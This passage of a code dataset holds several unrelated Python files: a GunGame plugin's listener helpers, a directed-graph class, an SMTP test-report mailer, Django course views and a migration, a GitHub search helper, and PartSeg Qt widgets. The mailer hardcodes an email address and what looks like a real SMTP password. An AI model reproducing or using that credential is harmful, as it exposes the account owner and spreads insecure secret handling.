Send the multi_kill message\n player.hint_message(\n message='LevelInfo:Current:Kills',\n kills=new_value,\n total=multi_kill,\n )\n player.play_sound('multi_kill')\n\n\n# =============================================================================\n# >> HELPER FUNCTIONS\n# =============================================================================\ndef start_match():\n \"\"\"Start the match if not already started or on hold.\"\"\"\n # Is warmup supposed to happen?\n if warmup_enabled.get_int():\n\n # Start warmup\n warmup_manager.start_warmup()\n return\n\n # Is the match supposed to start?\n if GunGameStatus.MATCH is GunGameMatchStatus.INACTIVE:\n\n # Start the match\n GG_Start().fire()\n\n\ndef _send_level_info(player):\n \"\"\"Send level information to the given player.\"\"\"\n # Get the player's language\n language = player.language\n\n # Get the player's current level information\n text = message_manager['LevelInfo:Current:Level'].get_string(\n language,\n player=player,\n total=weapon_order_manager.max_levels,\n )\n\n # Add the player's weapon information to the message\n text += message_manager['LevelInfo:Current:Weapon'].get_string(\n language,\n player=player,\n )\n\n # Get the player's current level's multi_kill value\n multi_kill = player.level_multi_kill\n\n # If the multi_kill value is not 1, add the multi_kill to the message\n if multi_kill > 1:\n text += message_manager['LevelInfo:Current:Kills'].get_string(\n language,\n kills=player.multi_kill,\n total=player.level_multi_kill,\n ) + '\\n'\n\n # Get the current leaders\n leaders = leader_manager.current_leaders\n\n # Get the leader's level\n leader_level = leader_manager.leader_level\n\n # Are there no leaders?\n if leaders is None:\n\n # Add the no leaders text to the message\n text += message_manager['LevelInfo:Leaders:None'].get_string(language)\n\n # Is the player the only current leader?\n elif len(leaders) == 1 and player.userid in leaders:\n\n # Add the current leader text to the message\n text += message_manager[\n 'LevelInfo:Current:Leader'\n ].get_string(language)\n\n # Is the player one of multiple current leaders?\n elif len(leaders) > 1 and player.userid in leaders:\n\n # Add the amongst leaders text to the message\n text += message_manager[\n 'LevelInfo:Leaders:Among'\n ].get_string(language)\n\n # Is the player not one of the current leaders?\n else:\n\n # Add the current leader text to the message\n text += message_manager['LevelInfo:Leaders:Level'].get_string(\n language,\n level=leader_level,\n total=weapon_order_manager.max_levels,\n weapon=weapon_order_manager.active[leader_level].weapon,\n )\n\n # Send the player's level information message\n player.hint_message(message=text)\n\n\ndef _punish_suicide(userid):\n levels = suicide_punish.get_int()\n if not levels:\n return\n\n if userid in _team_changers:\n return\n\n player = player_dictionary.get(userid)\n if player is None:\n return\n\n if player.level == 1:\n return\n\n player.decrease_level(\n levels=levels,\n reason='suicide'\n )\n player.chat_message(\n message='Punishment:Suicide',\n player=player,\n )\n\n\ndef _punish_team_kill(player):\n levels = team_kill_punish.get_int()\n if not levels:\n return\n\n if player.levels == 1:\n if level_one_team_kill.get_int():\n player.slay()\n player.chat_message(\n message='Punishment:TeamKill:Slay',\n )\n return\n\n player.decrease_level(\n levels=levels,\n reason='team-kill',\n )\n player.chat_message(\n message='Punishment:TeamKill:Level',\n player=player,\n )\n","sub_path":"addons/source-python/plugins/gungame/core/listeners.py","file_name":"listeners.py","file_ext":"py","file_size_in_byte":16515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"372671714","text":"from GraphInterface import GraphInterface\r\nfrom NodeData import NodeData\r\n\r\n\r\nclass DiGraph(GraphInterface):\r\n\r\n def __init__(self):\r\n \"\"\"\r\n The constructor for object DiGraph\r\n \"\"\"\r\n self.nodes = {}\r\n self.NumOfEdges = 0\r\n self.ModeCount = 0\r\n\r\n def getNode(self, key):\r\n \"\"\"\r\n returns the node_data by the key.\r\n \"\"\"\r\n if key not in self.nodes:\r\n return None\r\n else:\r\n return self.nodes[key]\r\n\r\n def getEdge(self, src, dest):\r\n \"\"\"\r\n returns the data of the edge (src,dest), null if none.\r\n Note: this method should run in O(1) time.\r\n \"\"\"\r\n if src in self.nodes:\r\n return self.nodes[src].getNiEdge(dest)\r\n else:\r\n return None\r\n\r\n def addNode(self, n):\r\n \"\"\"\r\n adds a new node to the graph with the given node_data.\r\n \"\"\"\r\n if n.getKey() not in self.nodes:\r\n self.nodes[n.getKey()] = n\r\n self.ModeCount += 1\r\n\r\n def add_node(self, node_id, pos=None):\r\n \"\"\"\r\n adds a node to the graph with id 'node_id'\r\n \"\"\"\r\n n = NodeData(node_id, pos)\r\n self.addNode(n)\r\n\r\n def hasEdge(self, src, dest):\r\n \"\"\"\r\n return true iff (if and only if) there is an edge between src and dest\r\n Note: this method should run in O(1) time\r\n \"\"\"\r\n if src in self.nodes:\r\n return self.nodes[src].hasNi_out(dest)\r\n else:\r\n return False\r\n\r\n def add_edge(self, id1, id2, weight):\r\n \"\"\"\r\n Connects an edge with weight 'weight' between node id1 to node id2.\r\n Note: this method should run in O(1) time.\r\n \"\"\"\r\n if not self.hasEdge(id1, id2) and id1 != id2:\r\n self.nodes[id1].addNi_out(id2, weight)\r\n self.nodes[id2].addNi_in(id1)\r\n self.NumOfEdges += 1\r\n self.ModeCount += 1\r\n\r\n def getV(self):\r\n \"\"\"\r\n This method returns a pointer (shallow copy) for the\r\n collection representing all the nodes in the graph.\r\n Note: this method should run in O(1) time.\r\n \"\"\"\r\n return self.nodes.values()\r\n\r\n def get_all_v(self):\r\n \"\"\"\r\n return a dictionary of all the nodes in the Graph, each node is represented using a pair\r\n (node_id, node_data)\r\n \"\"\"\r\n return self.nodes\r\n\r\n def get_all_e(self):\r\n s = set()\r\n for v in self.nodes.values():\r\n for e in v.getNi_out():\r\n s.add(e)\r\n for e in v.getNi_in():\r\n s.add(self.getEdge(e, v.getKey()))\r\n return list(s)\r\n\r\n def all_in_edges_of_node(self, id1):\r\n \"\"\"\r\n return a dictionary of all the nodes connected to (into) node_id ,\r\n each node is represented using a pair (other_node_id, weight)\r\n \"\"\"\r\n if id1 in self.nodes:\r\n connected_nodes = {}\r\n in_edges = self.nodes[id1].getNi_in()\r\n for i in in_edges:\r\n connected_nodes[i] = self.getEdge(i, id1).getWeight()\r\n return connected_nodes\r\n else:\r\n return {}\r\n\r\n def all_out_edges_of_node(self, id1):\r\n \"\"\"\r\n return a dictionary of all the nodes connected from node_id , each node is represented using a pair\r\n (other_node_id, weight)\r\n \"\"\"\r\n if id1 in self.nodes:\r\n connected_nodes = {}\r\n out_edges = self.nodes[id1].getNi_out()\r\n for edge in out_edges:\r\n connected_nodes[edge.getDest()] = edge.getWeight()\r\n return connected_nodes\r\n else:\r\n return {}\r\n\r\n def getE(self, node_id):\r\n \"\"\"\r\n This method returns a pointer (shallow copy) for the\r\n collection representing all the edges getting out of\r\n the given node (all the edges starting (source) at the given node).\r\n Note: this method should run in O(k) time, k being the collection size.\r\n \"\"\"\r\n if node_id in self.nodes:\r\n return self.nodes[node_id].getNi_out()\r\n else:\r\n return {}\r\n\r\n def remove_node(self, key):\r\n \"\"\"\r\n Deletes the node (with the given ID) from the graph -\r\n and removes all edges which starts or ends at this node.\r\n This method should run in O(k), V.degree=k, as all the edges should be removed.\r\n \"\"\"\r\n if self.getNode(key) is not None:\r\n in_edges = self.nodes[key].getNi_in()\r\n for i in in_edges:\r\n self.nodes[i].removeEdge_out(key)\r\n self.NumOfEdges -= 1\r\n self.ModeCount += 1\r\n del self.nodes[key]\r\n return True\r\n else:\r\n return False\r\n\r\n def remove_edge(self, node_id1, node_id2):\r\n \"\"\"\r\n Deletes the edge from the graph.\r\n Note: this method should run in O(1) time.\r\n \"\"\"\r\n if self.hasEdge(node_id1, node_id2):\r\n e = self.nodes[node_id1].removeEdge_out(node_id2)\r\n self.nodes[node_id2].removeEdge_in(node_id1)\r\n self.NumOfEdges -= 1\r\n self.ModeCount += 1\r\n return e\r\n else:\r\n return None\r\n\r\n def v_size(self):\r\n \"\"\"\r\n Returns the number of vertices (nodes) in the graph.\r\n Note: this method should run in O(1) time.\r\n \"\"\"\r\n return len(self.nodes)\r\n\r\n def e_size(self):\r\n \"\"\"\r\n Returns the number of edges (assume directional graph).\r\n Note: this method should run in O(1) time.\r\n \"\"\"\r\n return self.NumOfEdges\r\n\r\n def get_mc(self):\r\n \"\"\"\r\n Returns the Mode Count - for tests changes in the graph.\r\n \"\"\"\r\n return self.ModeCount\r\n\r\n def __eq__(self, other):\r\n \"\"\"\r\n equals function - return true if the two object are equals.\r\n else, return false.\r\n \"\"\"\r\n if len(self.nodes) != len(other.getV()):\r\n return False\r\n for i in self.nodes:\r\n if other.getNode(i) is None:\r\n return False\r\n if other.getNode(i) != self.nodes[i]:\r\n return False\r\n return True\r\n\r\n def __repr__(self):\r\n \"\"\"\r\n Returns a string representing the directed graph\r\n \"\"\"\r\n s = \"-----\\nDiGraph: \\nNodes: (Total of \" + str(self.v_size()) + \" nodes.\\n\"\r\n for n in self.nodes.values():\r\n s += str(n.getKey()) + ', '\r\n s += \"\\nEdges: (Total of \" + str(self.e_size()) + \" edges.\\n\"\r\n for e in self.get_all_e():\r\n s += \"edge src: \" + str(e.getSrc()) + \", dest: \" + str(e.getDest()) + \", w: \" + str(e.getWeight()) + '\\n'\r\n s += \"Num of MC: \" + str(self.ModeCount) + \"\\n-----\"\r\n return s\r\n\r\n\r\n","sub_path":"ex3/src/DiGraph.py","file_name":"DiGraph.py","file_ext":"py","file_size_in_byte":6835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"595316878","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport smtplib\nfrom email import encoders\nfrom email.header import Header\nfrom email.mime.base import MIMEBase\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\nfrom utils.common.log import logger\nfrom utils.config import Config, REPORT_FILE\n\n\nclass Mail(object):\n def __init__(self, target_address_list):\n e = Config().get('mail')\n self.mail_host = e.get(\n 'mail_host') if e and e.get('mail_host') else \"smtp.qq.com\"\n self.host_port = e.get(\n 'host_port') if e and e.get('host_port') else 465\n self.mail_user = e.get(\n 'mail_user') if e and e.get('mail_user') else \"78376474@qq.com\"\n self.mail_pwd = e.get(\n 'mail_pwd') if e and e.get('mail_pwd') else \"onctyyqycumtcbbb\"\n\n self.target_addr_list = target_address_list\n self.mail_subject = \"Test report\"\n self.charset = 'utf-8'\n\n # create a mail object based on email().MIMEMultipart()\n # module email is responsible for mail's content\n def mail_obj(self):\n mail_obj = MIMEMultipart()\n mail_obj['Subject'] = Header(self.mail_subject, self.charset)\n # mail_obj['From'] = Header(self.mail_user, charset)\n return mail_obj\n\n def attach_content(self, email_obj):\n f = open(REPORT_FILE, 'rb')\n mail_body = f.read()\n f.close()\n content = MIMEText(mail_body, 'html', self.charset)\n email_obj.attach(content)\n\n @staticmethod\n def attach_file(email_obj):\n file = MIMEBase('application', 'octet-stream')\n file.set_payload(open(REPORT_FILE, 'rb').read())\n encoders.encode_base64(file)\n file_name = os.path.basename(REPORT_FILE)\n file.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % (file_name))\n email_obj.attach(file)\n\n # module smtplib is responsible for send mail\n def send_mail(self, email_obj):\n smtp_obj = smtplib.SMTP_SSL(self.mail_host, self.host_port)\n try:\n smtp_obj.login(self.mail_user, self.mail_pwd)\n except smtplib.SMTPAuthenticationError as e:\n logger.exception(\"Authentication failed!! \\r%s\" % (e))\n for address in self.target_addr_list:\n try:\n smtp_obj.sendmail(self.mail_user, address, email_obj.as_string())\n logger.info(\"Report has been successful sent to %s\" % (address))\n except smtplib.SMTPException as e:\n logger.error(\"Fail to sent report to %s\" % (address))\n logger.exception(\"caused by %s\" % (e))\n smtp_obj.quit()\n\n def send(self):\n mail_obj = self.mail_obj()\n self.attach_content(mail_obj)\n self.attach_file(mail_obj)\n self.send_mail(mail_obj)\n\n\nif __name__ == '__main__':\n target_addr_list = [\"dfjakljdsafsdaf@qq.com\", \"78376474@qq.com\"]\n E = Mail(target_addr_list)\n E.send()\n","sub_path":"utils/common/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"402667433","text":"#encoding: utf-8\nfrom django.shortcuts import render\nfrom django.views.generic.base import View\n# Create your views here.\n\nfrom .models import Course,CourseResource\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom operation.models import UserFavourites,CourseComments,UserCourse\nfrom django.http import HttpResponse\nfrom utils.mixin_utils import LoginRequiredMixin\nfrom django.db.models import Q\nclass CourseListView(View):\n def get(self,request):\n allCourses = Course.objects.all().order_by(\"-add_time\")\n hotCourses = Course.objects.all().order_by(\"-click_nums\")[:3]\n keywords = request.GET.get(\"keywords\",\"\")\n if keywords:\n allCourses = allCourses.filter(Q(name__icontains=keywords)|Q(detail__icontains=keywords)|Q(description__icontains=keywords))\n sort = request.GET.get(\"sort\", \"\")\n if sort == 'students':\n allCourses = allCourses.order_by(\"-students\")\n elif sort == 'hot':\n allCourses = allCourses.order_by(\"-click_nums\")\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n\n # Provide Paginator with the request object for complete querystring generation\n\n p = Paginator(allCourses, 1, request=request)\n\n allCourses = p.page(page)\n return render(request,'course-list.html',{\"allCourses\":allCourses,\"sort\":sort,'hotCourses':hotCourses})\n\nclass CourseDetailView(View):\n def get(self,request,course_id):\n hasFavourtieCourse = False\n hasFavourtieOrg = False\n if request.user.is_authenticated:\n if UserFavourites.objects.filter(user=request.user,fav_id=course_id):\n hasFavourtieCourse = True\n if UserFavourites.objects.filter(user=request.user,fav_id=2):\n hasFavourtieOrg = True\n\n course = Course.objects.get(id=int(course_id))\n course.click_nums += 1\n course.save()\n tag = course.tag\n if tag:\n relatedCourse = Course.objects.filter(tag=tag)\n else:\n relatedCourse = []\n return render(request,'course-detail.html',{\"course\":course,\"relatedCourse\":relatedCourse,\n \"hasFavourtieCourse\":hasFavourtieCourse,\"hasFavourtieOrg\":hasFavourtieOrg})\n\nclass CourseInfoView(LoginRequiredMixin,View):\n def get(self,request,course_id):\n course = Course.objects.get(id=int(course_id))\n userCourse = UserCourse.objects.filter(course=course)\n if not userCourse:\n userCourse = UserCourse(user=request.user,course=course)\n userCourse.save()\n userCouses = UserCourse.objects.filter(course=course)\n userIds = [userCourse.user.id for userCourse in userCouses]\n all_user_courses = UserCourse.objects.filter(user_id__in=userIds)\n course_ids = [user_course.course.id for user_course in all_user_courses]\n related_courses = Course.objects.filter(id__in=course_ids)\n allLessons = course.get_lessons()\n allResources = CourseResource.objects.all().filter(course=course)\n return render(request,'course-video.html',{\"course\":course,\"allLessons\":allLessons,\"allResources\":allResources,\"related_courses\":related_courses})\nclass CourseCommentView(LoginRequiredMixin,View):\n def get(self,request,course_id):\n course = Course.objects.get(id=int(course_id))\n userCouses = UserCourse.objects.filter(course=course)\n userIds = [userCourse.user.id for userCourse in userCouses]\n all_user_courses = UserCourse.objects.filter(user_id__in=userIds)\n course_ids = [user_course.course.id for user_course in all_user_courses]\n related_courses = Course.objects.filter(id__in=course_ids)\n comments = course.coursecomments_set.all()\n return render(request,'course-comment.html',{\"course\":course,\"comments\":comments,\"related_courses\":related_courses})\n\nclass AddCourseCommentsView(View):\n def post(self,request):\n if not request.user.is_authenticated():\n return HttpResponse('{\"status\":\"fail\",\"msg\":\"用户未登录\"}',content_type='application/json')\n else:\n couseId = request.POST.get(\"courseId\",0)\n comments = request.POST.get(\"comment\",\"\")\n if couseId > 0 and comments:\n course = Course.objects.get(id=int(couseId))\n courseComment = CourseComments()\n courseComment.course = course\n courseComment.user = request.user\n courseComment.comments = comments\n courseComment.save()\n return HttpResponse('{\"status\":\"success\",\"msg\":\"添加成功}',content_type='application/json')\n else:\n return HttpResponse({\"status\":\"fail\",\"msg\":\"添加失败\"},content_type='application/json')\n","sub_path":"apps/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"133791568","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Blog',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('Createtime', models.DateTimeField(auto_now_add=True)),\n ('Content', models.CharField(max_length=500)),\n ('Link', models.CharField(max_length=300)),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='Class',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('ClassNumber', models.IntegerField()),\n ('GenerateYear', models.DateTimeField()),\n ('Type', models.CharField(max_length=3, choices=[(b'\\xe5\\xb9\\xbc\\xe7\\xa8\\x9a\\xe5\\x9b\\xad', b'\\xe5\\xb9\\xbc\\xe7\\xa8\\x9a\\xe5\\x9b\\xad'), (b'\\xe5\\xad\\xa6\\xe5\\x89\\x8d\\xe7\\x8f\\xad', b'\\xe5\\xad\\xa6\\xe5\\x89\\x8d\\xe7\\x8f\\xad'), (b'\\xe5\\xb0\\x8f\\xe5\\xad\\xa6', b'\\xe5\\xb0\\x8f\\xe5\\xad\\xa6'), (b'\\xe5\\x88\\x9d\\xe4\\xb8\\xad', b'\\xe5\\x88\\x9d\\xe4\\xb8\\xad'), (b'\\xe9\\xab\\x98\\xe4\\xb8\\xad', b'\\xe9\\xab\\x98\\xe4\\xb8\\xad')])),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='ClassUser',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('idClass', models.ForeignKey(related_name='fkClassUser2Class', to='School.Class')),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='Ralation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('Ralation', models.CharField(max_length=2, choices=[(b'\\xe7\\x88\\xb6\\xe4\\xba\\xb2', b'\\xe7\\x88\\xb6\\xe4\\xba\\xb2'), (b'\\xe6\\xaf\\x8d\\xe4\\xba\\xb2', b'\\xe6\\xaf\\x8d\\xe4\\xba\\xb2'), (b'\\xe7\\x88\\xb7\\xe7\\x88\\xb7', b'\\xe7\\x88\\xb7\\xe7\\x88\\xb7'), (b'\\xe5\\xa5\\xb6\\xe5\\xa5\\xb6', b'\\xe5\\xa5\\xb6\\xe5\\xa5\\xb6'), (b'\\xe5\\xa4\\x96\\xe5\\x85\\xac', b'\\xe5\\xa4\\x96\\xe5\\x85\\xac'), (b'\\xe5\\xa4\\x96\\xe5\\xa9\\x86', b'\\xe5\\xa4\\x96\\xe5\\xa9\\x86'), (b'\\xe5\\xa5\\xbd\\xe5\\x8f\\x8b', b'\\xe5\\xa5\\xbd\\xe5\\x8f\\x8b')])),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='School',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('Name', models.CharField(max_length=45)),\n ('Provence', models.CharField(max_length=20)),\n ('City', models.CharField(max_length=20)),\n ('Address', models.CharField(max_length=200)),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('PhoneNumber', models.CharField(max_length=11)),\n ('Password', models.CharField(max_length=256)),\n ('UserName', models.CharField(default=b'', max_length=16)),\n ('MingZi', models.CharField(default=b'', max_length=16)),\n ('Sex', models.CharField(default=b'\\xe7\\x94\\xb7', max_length=3, choices=[(b'\\xe7\\x94\\xb7', b'\\xe7\\x94\\xb7'), (b'\\xe5\\xa5\\xb3', b'\\xe5\\xa5\\xb3')])),\n ('Role', models.CharField(default=b'\\xe5\\x85\\xb6\\xe4\\xbb\\x96', max_length=3, choices=[(b'\\xe6\\x95\\x99\\xe5\\xb8\\x88', b'\\xe6\\x95\\x99\\xe5\\xb8\\x88'), (b'\\xe5\\xae\\xb6\\xe9\\x95\\xbf', b'\\xe5\\xae\\xb6\\xe9\\x95\\xbf'), (b'\\xe5\\xad\\xa6\\xe7\\x94\\x9f', b'\\xe5\\xad\\xa6\\xe7\\x94\\x9f'), (b'\\xe5\\x85\\xb6\\xe4\\xbb\\x96', b'\\xe5\\x85\\xb6\\xe4\\xbb\\x96'), (b'\\xe5\\xbc\\x80\\xe6\\x8b\\x93\\xe8\\x80\\x85', b'\\xe5\\xbc\\x80\\xe6\\x8b\\x93\\xe8\\x80\\x85'), (b'\\xe7\\xae\\xa1\\xe7\\x90\\x86\\xe5\\x91\\x98', b'\\xe7\\xae\\xa1\\xe7\\x90\\x86\\xe5\\x91\\x98')])),\n ('HeaderFigure', models.CharField(max_length=300)),\n ('Nick', models.CharField(max_length=200)),\n ('CreateTime', models.DateTimeField(auto_now_add=True)),\n ('ModifyTime', models.DateTimeField(auto_now_add=True)),\n ('LastLoginTime', models.DateTimeField(auto_now_add=True)),\n ('CurStatus', models.CharField(max_length=3)),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='UserToken',\n fields=[\n ('token', models.CharField(max_length=32, serialize=False, primary_key=True)),\n ('idUser', models.ForeignKey(related_name='fkToken2User', to='School.User')),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.AddField(\n model_name='school',\n name='Principal',\n field=models.ForeignKey(related_name='fkSchool2User', to='School.User'),\n ),\n migrations.AddField(\n model_name='ralation',\n name='idUser',\n field=models.ForeignKey(related_name='fkcurUser2User', to='School.User'),\n ),\n migrations.AddField(\n model_name='ralation',\n name='idUserRalation',\n field=models.ForeignKey(related_name='fkRalationUser2User', to='School.User'),\n ),\n migrations.AddField(\n model_name='classuser',\n name='idUser',\n field=models.ForeignKey(related_name='fkClassUser2User', to='School.User'),\n ),\n migrations.AddField(\n model_name='class',\n name='idSchool',\n field=models.ForeignKey(related_name='fkClass2School', to='School.School'),\n ),\n migrations.AddField(\n model_name='blog',\n name='idAtClass',\n field=models.ForeignKey(related_name='fkBlog2Class', to='School.Class'),\n ),\n migrations.AddField(\n model_name='blog',\n name='idAtStudent',\n field=models.ForeignKey(related_name='fkBlog2StudentUser', to='School.User'),\n ),\n migrations.AddField(\n model_name='blog',\n name='idSender',\n field=models.ForeignKey(related_name='fkBlog2SenderUser', to='School.User'),\n ),\n ]\n","sub_path":"src/School/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":6787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"216201943","text":"import urllib2, json, csv\n\n'''Provides methods that interact with and parse responses from github'''\n\ndef get_top_five_login_names(user_input):\n\t\"\"\"Return top five login names on github as a list, based on user_input.\n\tuser_input -- the string to search for\n\t\"\"\"\n\tuser_input = \"+\".join(user_input.split())\n\tresponse = urllib2.urlopen(\"https://api.github.com/search/users?q=\"+user_input).read() #make a request to github rest endpoint\n\tdecoded = json.loads(response) #decode the json response into a python dictionary\n\tusers = decoded['items'] #get just the user info\n\tusers.sort(key=lambda user:user[\"login\"]) #sort users alphabetically by login\n\tusers = users[:5] #get the top five\n\ttop_five = [user[\"login\"] for user in users] #extract just the user names\n\treturn top_five\n\ndef get_char_freq_dist(string):\n\t\"\"\"Given a string, return a list of character frequencies, where index \n\tcorresponds with alphabetical order. The last index represents the number of \n\tnon-alphabetical characters.\"\"\"\n\tchar_frequency = [0]*27\n\tfor c in string:\n\t\to = ord(c) - 97 #set 'a' as the character with ord 0\n\t\tif o < 0 or o > 25: #if ord is not in alphabetical range\n\t\t\tchar_frequency[26] += 1 #increase 'other' freq\n\t\telse:\n\t\t\tchar_frequency[o] += 1 #increase corresponding letter freq\n\treturn char_frequency\n\ndef get_q1_info(user_input):\n\t'''Given a user_input, outputs answer in JSON parsable format.'''\n\ttop_five = get_top_five_login_names(user_input)\n\ts = \"\".join(top_five).lower() #concatenate the names into one string and change it to lower case\n\treturn get_char_freq_dist(s)\n\n","sub_path":"equity-zen/q1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507835065","text":"import collections\nimport typing\nfrom abc import ABCMeta, abstractmethod\nfrom copy import deepcopy\nfrom enum import Enum\n\nfrom qtpy.QtCore import Signal\nfrom qtpy.QtGui import QHideEvent, QPainter, QPaintEvent\nfrom qtpy.QtWidgets import (\n QApplication,\n QCheckBox,\n QComboBox,\n QFormLayout,\n QLabel,\n QLineEdit,\n QMessageBox,\n QScrollArea,\n QStackedLayout,\n QVBoxLayout,\n QWidget,\n)\nfrom six import with_metaclass\n\nfrom PartSeg.common_gui.error_report import ErrorDialog\nfrom PartSegCore.algorithm_describe_base import AlgorithmDescribeBase, AlgorithmProperty, SegmentationProfile\nfrom PartSegCore.channel_class import Channel\nfrom PartSegCore.image_operations import RadiusType\nfrom PartSegCore.segmentation.algorithm_base import (\n SegmentationAlgorithm,\n SegmentationLimitException,\n SegmentationResult,\n)\nfrom PartSegImage import Image\n\nfrom ..common_backend.base_settings import BaseSettings\nfrom ..common_backend.segmentation_thread import SegmentationThread\nfrom .dim_combobox import DimComboBox\nfrom .universal_gui_part import ChannelComboBox, CustomDoubleSpinBox, CustomSpinBox, EnumComboBox\n\n\ndef update(d, u):\n for k, v in u.items():\n if isinstance(v, collections.abc.Mapping):\n d[k] = update(d.get(k, {}), v)\n else:\n d[k] = v\n return d\n\n\nclass QtAlgorithmProperty(AlgorithmProperty):\n qt_class_dict = {\n int: CustomSpinBox,\n float: CustomDoubleSpinBox,\n list: QComboBox,\n bool: QCheckBox,\n RadiusType: DimComboBox,\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._widget = self._get_field()\n self.change_fun = self.get_change_signal(self._widget)\n self._getter, self._setter = self.get_getter_and_setter_function(self._widget)\n self._setter(self._widget, self.default_value)\n\n def get_value(self):\n return self._getter(self._widget)\n\n def recursive_get_values(self):\n if isinstance(self._widget, SubAlgorithmWidget):\n return self._widget.recursive_get_values()\n else:\n return self.get_value()\n\n def set_value(self, val):\n \"\"\"set value of widget \"\"\"\n return self._setter(self._widget, val)\n\n def get_field(self) -> QWidget:\n \"\"\"\n Get representing widget\n :return:\n :rtype:\n \"\"\"\n return self._widget\n\n @classmethod\n def from_algorithm_property(cls, ob):\n \"\"\"\n Create class instance base on :py:class:`.AlgorithmProperty` instance\n\n :type ob: AlgorithmProperty | str\n :param ob: AlgorithmProperty object or label\n :return: QtAlgorithmProperty | QLabel\n \"\"\"\n if isinstance(ob, AlgorithmProperty):\n return cls(\n name=ob.name,\n user_name=ob.user_name,\n default_value=ob.default_value,\n options_range=ob.range,\n single_steep=ob.single_step,\n property_type=ob.value_type,\n possible_values=ob.possible_values,\n help_text=ob.help_text,\n per_dimension=ob.per_dimension,\n )\n elif isinstance(ob, str):\n return QLabel(ob)\n raise ValueError(f\"unknown parameter type {type(ob)} of {ob}\")\n\n def _get_field(self) -> QWidget:\n \"\"\"\n Get proper widget for given field type. Overwrite if would like to support new data types.\n \"\"\"\n if self.per_dimension:\n self.per_dimension = False\n prop = self.from_algorithm_property(self)\n self.per_dimension = True\n res = ListInput(prop, 3)\n elif issubclass(self.value_type, Channel):\n res = ChannelComboBox()\n res.change_channels_num(10)\n return res\n elif issubclass(self.value_type, AlgorithmDescribeBase):\n res = SubAlgorithmWidget(self)\n elif issubclass(self.value_type, bool):\n res = QCheckBox()\n elif issubclass(self.value_type, int):\n res = CustomSpinBox()\n if not isinstance(self.default_value, int):\n raise ValueError(\n f\"Incompatible types. default_value should be type of int. Is {type(self.default_value)}\"\n )\n if self.range is not None:\n res.setRange(*self.range)\n elif issubclass(self.value_type, float):\n res = CustomDoubleSpinBox()\n if not isinstance(self.default_value, float):\n raise ValueError(\n f\"Incompatible types. default_value should be type of float. Is {type(self.default_value)}\"\n )\n if self.range is not None:\n res.setRange(*self.range)\n elif issubclass(self.value_type, str):\n res = QLineEdit()\n elif issubclass(self.value_type, Enum):\n res = EnumComboBox(self.value_type)\n # noinspection PyUnresolvedReferences\n elif issubclass(self.value_type, list):\n res = QComboBox()\n res.addItems(list(map(str, self.possible_values)))\n else:\n raise ValueError(f\"Unknown class: {self.value_type}\")\n tool_tip_text = \"\"\n if self.help_text:\n tool_tip_text = self.help_text\n tool_tip_text += f\" default value: {str(self.default_value)}\"\n res.setToolTip(tool_tip_text)\n return res\n\n @staticmethod\n def get_change_signal(widget: QWidget):\n if isinstance(widget, QComboBox):\n return widget.currentIndexChanged\n elif isinstance(widget, QCheckBox):\n return widget.stateChanged\n elif isinstance(widget, (CustomDoubleSpinBox, CustomSpinBox)):\n return widget.valueChanged\n elif isinstance(widget, QLineEdit):\n return widget.textChanged\n elif isinstance(widget, SubAlgorithmWidget):\n return widget.values_changed\n elif isinstance(widget, ListInput):\n return widget.change_signal\n raise ValueError(f\"Unsupported type: {type(widget)}\")\n\n @staticmethod\n def get_getter_and_setter_function(\n widget: QWidget,\n ) -> typing.Tuple[\n typing.Callable[[QWidget,], typing.Any], typing.Callable[[QWidget, typing.Any], None] # noqa E231\n ]:\n \"\"\"\n For each widget type return proper functions. This functions need instance as first argument\n\n :return: (getter, setter)\n \"\"\"\n if isinstance(widget, ChannelComboBox):\n return widget.__class__.get_value, widget.__class__.set_value\n if isinstance(widget, EnumComboBox):\n return widget.__class__.get_value, widget.__class__.set_value\n if isinstance(widget, QComboBox):\n return widget.__class__.currentText, widget.__class__.setCurrentText\n elif isinstance(widget, QCheckBox):\n return widget.__class__.isChecked, widget.__class__.setChecked\n elif isinstance(widget, CustomSpinBox):\n return widget.__class__.value, widget.__class__.setValue\n elif isinstance(widget, 